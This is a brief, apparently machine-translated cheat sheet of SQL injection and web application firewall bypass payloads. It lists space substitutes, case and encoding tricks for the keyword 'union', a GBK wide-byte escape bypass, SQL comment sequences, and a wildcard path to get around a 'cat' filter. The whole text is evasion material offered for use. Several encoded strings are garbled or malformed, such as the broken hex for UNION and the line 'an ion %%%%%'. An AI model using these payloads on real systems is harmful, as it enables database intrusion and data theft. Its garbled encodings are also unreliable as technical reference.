table of Contents
- Space bypass
- Keyword bypass
- Note
0x001 injection bypass
1. Space bypass:
In the injection process, the space was filtered, then the other may be used instead of spaces for bypass, the following may be substituted for a space to try;
tab
/**/
/*!union*/
/*!50000union*/
% 0a% 0b (vertical tab)% 0c% 0d
%20
%2520
2. Keyword bypass (instead of the keyword in the following way bypass):
Case: uNion UnION UNion UNION
Dual wrote: ununionion available
url encoding: the union encoded% 75% 6E% 69% 6F% 6E
union portion encodes u% 6eion
UNION ->% 55% 49%% 4E 4F 4E%
asp: an ion %%%%%
Dual encoding:% 2575% 256E% 2569% 256F% 256E
>> bypass security equipment
Byte Width: unicode, gbk
php: gpc = special symbols on the front plus an escape character: \
id=1'-->1\'
Bypass:% df
1%df'-->1%df\'-->1%df%5c'-->1運'
Wildcard about waf: add path
*
?
Bypassing the cat is filtered:
/ Bin / c? T
3. Comment
>> Notes sql statement contains:
mssql:--
mysql:--%20
#
23% (equivalent to #)
-- -
--+
//
;
/**/
/*!aaa*/